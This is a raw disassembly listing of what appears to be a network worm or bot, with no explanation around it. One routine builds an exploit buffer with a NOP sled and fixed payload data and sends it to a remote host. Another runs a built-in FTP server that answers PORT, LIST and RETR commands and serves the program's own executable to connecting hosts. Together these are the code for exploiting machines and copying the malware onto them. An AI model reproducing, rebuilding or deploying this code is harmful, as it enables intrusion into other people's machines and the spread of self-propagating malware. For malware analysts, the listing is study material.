test eax, eax
jnz short loc_410C2F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C2F: ; CODE XREF: sub_410B52+D6�j
push 0DEh
push offset dword_41B088
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C6F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C6F: ; CODE XREF: sub_410B52+116�j
movsx eax, [ebp+var_7CC]
sub eax, 30h
mov [ebp+var_208], al
movsx eax, [ebp+var_7C8]
sub eax, 30h
mov [ebp+var_4], al
push 3Eh
push offset dword_41B168
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410CC9
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410CC9: ; CODE XREF: sub_410B52+170�j
push 60h
push offset dword_41B1A8
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D06
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D06: ; CODE XREF: sub_410B52+1AD�j
push 0A0h
push offset dword_41B20C
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D46
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D46: ; CODE XREF: sub_410B52+1ED�j
movsx eax, [ebp+var_208]
cmp eax, 5
jnz loc_410E71
movsx eax, [ebp+var_4]
cmp eax, 1
jnz loc_410E71
push 86h
push offset dword_41B2B0
lea eax, [ebp+var_B78]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_20C]
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_AF2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0
mov eax, 264h
sub eax, [ebp+var_20C]
add eax, 60h
push eax
mov eax, [ebp+var_20C]
lea eax, [ebp+eax+var_AF2]
push eax
loc_410DB7: ; DATA XREF: .data:off_419A7C�o
call sub_410F60
add esp, 0Ch
push 4
push offset dword_41B410
lea eax, [ebp+var_88E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_882]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_85E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_852]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 20h
push offset dword_41B338
lea eax, [ebp+var_82E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 36Ah
lea eax, [ebp+var_B78]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 400h
call dword_41709C ; Sleep
push 36Ah
lea eax, [ebp+var_B78]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410E71: ; CODE XREF: sub_410B52+1FE�j
; sub_410B52+20B�j
movsx eax, [ebp+var_208]
cmp eax, 5
jnz short loc_410E85
movsx eax, [ebp+var_4]
test eax, eax
jz short loc_410E95
loc_410E85: ; CODE XREF: sub_410B52+329�j
movsx eax, [ebp+var_208]
cmp eax, 4
jnz locret_410F5E
loc_410E95: ; CODE XREF: sub_410B52+331�j
push 86h
push offset dword_41B35C
lea eax, [ebp+var_104C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E8h
sub eax, [ebp+var_20C]
push eax
push 90h
lea eax, [ebp+var_FC6]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push [ebp+var_20C]
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_BDE]
sub eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
and [ebp+var_B7C], 0
jmp short loc_410F06
; ---------------------------------------------------------------------------
loc_410EF9: ; CODE XREF: sub_410B52+3DA�j
mov eax, [ebp+var_B7C]
inc eax
mov [ebp+var_B7C], eax
loc_410F06: ; CODE XREF: sub_410B52+3A5�j
cmp [ebp+var_B7C], 10h
jge short loc_410F2E
push 4
push offset dword_41B408
mov eax, [ebp+var_B7C]
lea eax, [ebp+eax*4+var_BDE]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_410EF9
; ---------------------------------------------------------------------------
loc_410F2E: ; CODE XREF: sub_410B52+3BB�j
push 20h
push offset dword_41B3E4
lea eax, [ebp+var_B9E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4CEh
lea eax, [ebp+var_104C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
locret_410F5E: ; CODE XREF: sub_410B52+58�j
; sub_410B52+98�j ...
leave
retn
sub_410B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F60 proc near ; CODE XREF: sub_410B52:loc_410DB7�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_8], 0
jnz short loc_410FA4
and [ebp+var_4], 0
jmp short loc_410F79
; ---------------------------------------------------------------------------
loc_410F72: ; CODE XREF: sub_410F60+3D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410F79: ; CODE XREF: sub_410F60+10�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_410F9F
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov al, byte_41BB00[eax]
mov [ecx], al
jmp short loc_410F72
; ---------------------------------------------------------------------------
loc_410F9F: ; CODE XREF: sub_410F60+1F�j
jmp locret_41102D
; ---------------------------------------------------------------------------
loc_410FA4: ; CODE XREF: sub_410F60+A�j
cmp [ebp+arg_8], 7Fh
jnz short loc_410FDF
and [ebp+var_8], 0
jmp short loc_410FB7
; ---------------------------------------------------------------------------
loc_410FB0: ; CODE XREF: sub_410F60+7B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_410FB7: ; CODE XREF: sub_410F60+4E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jnb short loc_410FDD
push 5
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov al, byte_41BB00[eax]
mov [ecx], al
jmp short loc_410FB0
; ---------------------------------------------------------------------------
loc_410FDD: ; CODE XREF: sub_410F60+5D�j
jmp short locret_41102D
; ---------------------------------------------------------------------------
loc_410FDF: ; CODE XREF: sub_410F60+48�j
and [ebp+var_C], 0
loc_410FE3: ; CODE XREF: sub_410F60+AD�j
; sub_410F60+CB�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnb short locret_41102D
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_10], al
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_8]
and ecx, dword_41BB01[eax]
test ecx, ecx
jz short loc_41100F
jmp short loc_410FE3
; ---------------------------------------------------------------------------
loc_41100F: ; CODE XREF: sub_410F60+AB�j
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_C]
mov al, byte_41BB00[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_410FE3
; ---------------------------------------------------------------------------
locret_41102D: ; CODE XREF: sub_410F60:loc_410F9F�j
; sub_410F60:loc_410FDD�j ...
leave
retn
sub_410F60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41102F proc near ; CODE XREF: sub_41113B+79B�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
push 0EA60h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4050EA
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411065
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_41106C
loc_411065: ; CODE XREF: sub_41102F+2B�j
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41106C: ; CODE XREF: sub_41102F+34�j
push offset aRb ; "rb"
push offset dword_41EAFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_41109F
push [ebp+var_204]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41109F: ; CODE XREF: sub_41102F+5B�j
; sub_41102F:loc_41111C�j
mov eax, [ebp+var_208]
mov eax, [eax+0Ch]
and eax, 10h
test eax, eax
jnz short loc_41111E
push [ebp+var_208]
push 200h
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_20C], eax
push [ebp+var_20C]
lea eax, [ebp+var_200]
push eax
push [ebp+var_204]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_210], eax
mov eax, [ebp+var_20C]
cmp eax, [ebp+var_210]
jz short loc_41111C
push [ebp+var_204]
call sub_4053B1
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
xor eax, eax
jmp short locret_411139
; ---------------------------------------------------------------------------
loc_41111C: ; CODE XREF: sub_41102F+CF�j
jmp short loc_41109F
; ---------------------------------------------------------------------------
loc_41111E: ; CODE XREF: sub_41102F+7E�j
push [ebp+var_204]
call sub_40538D
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
locret_411139: ; CODE XREF: sub_41102F+38�j
; sub_41102F+6B�j ...
leave
retn
sub_41102F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41113B proc near ; DATA XREF: sub_411BBC+156�o
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_544 = dword ptr -544h
var_540 = byte ptr -540h
var_53C = byte ptr -53Ch
var_538 = byte ptr -538h
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_52C = dword ptr -52Ch
var_528 = dword ptr -528h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_318 = byte ptr -318h
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 558h
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_10C], eax
push offset dword_41C6B0
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
mov al, byte_41DE00
mov [ebp+var_104], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
mov al, byte_41DE00
mov [ebp+var_114], al
xor eax, eax
lea edi, [ebp+var_113]
stosd
stosb
and [ebp+var_4], 0
and [ebp+var_118], 0
and [ebp+var_108], 0
loc_4111CC: ; CODE XREF: sub_41113B+10C�j
; sub_41113B+1BD�j ...
push 0EA60h
push [ebp+var_10C]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jz loc_4119BA
push 200h
lea eax, [ebp+var_318]
push eax
push [ebp+var_10C]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_520], eax
cmp [ebp+var_520], 0
jz short loc_411218
cmp [ebp+var_520], 0FFFFFFFFh
jnz short loc_41121D
loc_411218: ; CODE XREF: sub_41113B+D2�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41121D: ; CODE XREF: sub_41113B+DB�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
lea eax, [ebp+var_318]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_528], eax
cmp [ebp+var_528], 0
jnz short loc_411249
jmp short loc_4111CC
; ---------------------------------------------------------------------------
loc_411249: ; CODE XREF: sub_41113B+10A�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_51C], eax
cmp [ebp+var_51C], 0
jnz short loc_411278
mov [ebp+var_51C], offset byte_41DE00
loc_411278: ; CODE XREF: sub_41113B+131�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
push [ebp+var_528]
call sub_40ED38
pop ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_524]
sub eax, dword_41C6A0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4112FD
mov [ebp+var_4], 1
push offset dword_41C698
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4112FD: ; CODE XREF: sub_41113B+178�j
mov eax, [ebp+var_524]
sub eax, dword_41C68C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41135D
mov [ebp+var_118], 1
push offset dword_41C684
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41135D: ; CODE XREF: sub_41113B+1D5�j
cmp [ebp+var_4], 0
jz short loc_41136C
cmp [ebp+var_118], 0
jnz short loc_411371
loc_41136C: ; CODE XREF: sub_41113B+226�j
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411371: ; CODE XREF: sub_41113B+22F�j
mov eax, [ebp+var_524]
sub eax, dword_41C678
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4113C7
push offset dword_41C670
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4113C7: ; CODE XREF: sub_41113B+249�j
mov eax, [ebp+var_524]
sub eax, dword_41C664
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41141D
push offset dword_41C65C
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41141D: ; CODE XREF: sub_41113B+29F�j
mov eax, [ebp+var_524]
sub eax, dword_41C654
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_411473
push offset dword_41C648
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411473: ; CODE XREF: sub_41113B+2F5�j
mov eax, [ebp+var_524]
sub eax, dword_41C63C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4114C9
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4114C9: ; CODE XREF: sub_41113B+34B�j
mov eax, [ebp+var_524]
sub eax, dword_41C628
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41151F
push offset dword_41C620
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41151F: ; CODE XREF: sub_41113B+3A1�j
mov eax, [ebp+var_524]
sub eax, dword_41C614
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411622
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_52C]
push eax
lea eax, [ebp+var_540]
push eax
lea eax, [ebp+var_53C]
push eax
lea eax, [ebp+var_538]
push eax
lea eax, [ebp+var_530]
push eax
push offset aUUUUUU ; "%u,%u,%u,%u,%u,%u"
push [ebp+var_51C]
call sub_416BA2 ; sscanf
add esp, 20h
movzx eax, [ebp+var_540]
push eax
movzx eax, [ebp+var_53C]
push eax
movzx eax, [ebp+var_538]
push eax
movzx eax, [ebp+var_530]
push eax
push offset dword_418A50
push 100h
lea eax, [ebp+var_104]
push eax
call sub_416BAE ; _snprintf
add esp, 1Ch
mov eax, [ebp+var_52C]
and eax, 0FFh
shl eax, 8
mov ecx, [ebp+var_534]
and ecx, 0FFh
or eax, ecx
push eax
push offset dword_418A60
push 6
lea eax, [ebp+var_114]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411622: ; CODE XREF: sub_41113B+3F7�j
mov eax, [ebp+var_524]
sub eax, dword_41C5F4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_4116E9
push offset aRb ; "rb"
push offset dword_41EAFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_548], eax
cmp [ebp+var_548], 0
jnz short loc_411660
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411660: ; CODE XREF: sub_41113B+51E�j
push 2
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_544], eax
push 0
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_544]
push offset dword_41C5E8
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4116E9: ; CODE XREF: sub_41113B+4FA�j
mov eax, [ebp+var_524]
sub eax, dword_41C5DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411873
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_54C], eax
cmp [ebp+var_54C], 0
jz short loc_411773
cmp [ebp+var_54C], 0FFFFFFFFh
jnz short loc_411778
loc_411773: ; CODE XREF: sub_41113B+62D�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411778: ; CODE XREF: sub_41113B+636�j
push offset aRb ; "rb"
push offset dword_41EAFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_554], eax
cmp [ebp+var_554], 0
jnz short loc_41179D
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41179D: ; CODE XREF: sub_41113B+65B�j
push 2
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_550], eax
push 0
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B82 ; fclose
pop ecx
push offset dword_41EAFC
push [ebp+var_550]
push offset aX32000Fh1024Ja ; "-x 3 2000 fh 1024 Jan 1 0:00 .\r\ndrwxr-x"...
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_54C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_54C]
call sub_40538D
pop ecx
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411873: ; CODE XREF: sub_41113B+5C1�j
mov eax, [ebp+var_524]
sub eax, dword_41C54C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411969
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_41102F
pop ecx
pop ecx
test eax, eax
jz loc_411967
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 1
push offset dword_41EAD8
call sub_409C88
pop ecx
pop ecx
inc eax
mov [ebp+var_558], eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_558]
push offset aFtp_0 ; "ftp"
push offset unk_41C520
push offset dword_41DA80
call sub_40D4AB
add esp, 14h
push 3E8h
call dword_41709C ; Sleep
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411967: ; CODE XREF: sub_41113B+7A4�j
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411969: ; CODE XREF: sub_41113B+74B�j
mov eax, [ebp+var_524]
sub eax, dword_41C514
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4119BA
push offset a221 ; "221 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
loc_4119BA: ; CODE XREF: sub_41113B+A5�j
; sub_41113B:loc_411218�j ...
push offset a231 ; "231 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_10C]
call sub_40538D
pop ecx
xor eax, eax
pop edi
leave
retn 4
sub_41113B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A09 proc near ; CODE XREF: sub_411BBC+90�p
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
push 32h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_411A29
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A29: ; CODE XREF: sub_411A09+17�j
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411A58
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411A5F
loc_411A58: ; CODE XREF: sub_411A09+44�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A5F: ; CODE XREF: sub_411A09+4D�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6D8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411A8A
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A8A: ; CODE XREF: sub_411A09+78�j
push offset dword_41C6CC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
pop ecx
pop ecx
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411AEE
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411AF5
loc_411AEE: ; CODE XREF: sub_411A09+DA�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411AF5: ; CODE XREF: sub_411A09+E3�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6C8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411B20
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411B20: ; CODE XREF: sub_411A09+10E�j
call sub_410422
push eax
push offset dword_41C6BC
lea eax, [ebp+var_200]
push eax
call sub_416B5E ; sprintf
add esp, 0Ch
lea eax, [ebp+var_200]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053BF
add esp, 0Ch
push 32h
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_405443
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411B8B
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411B8F
loc_411B8B: ; CODE XREF: sub_411A09+177�j
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411B8F: ; CODE XREF: sub_411A09+180�j
lea eax, [ebp+var_200]
push eax
call sub_407BF5
pop ecx
push offset dword_41C6B8
lea eax, [ebp+var_200]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jz short loc_411BB7
xor eax, eax
jmp short locret_411BBA
; ---------------------------------------------------------------------------
loc_411BB7: ; CODE XREF: sub_411A09+1A8�j
push 1
pop eax
locret_411BBA: ; CODE XREF: sub_411A09+1B�j
; sub_411A09+51�j ...
leave
retn
sub_411A09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411BBC proc near ; CODE XREF: sub_411D59+6�p
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = byte ptr -1BCh
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_1C0]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
mov [ebp+var_4], 1
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_8], 1
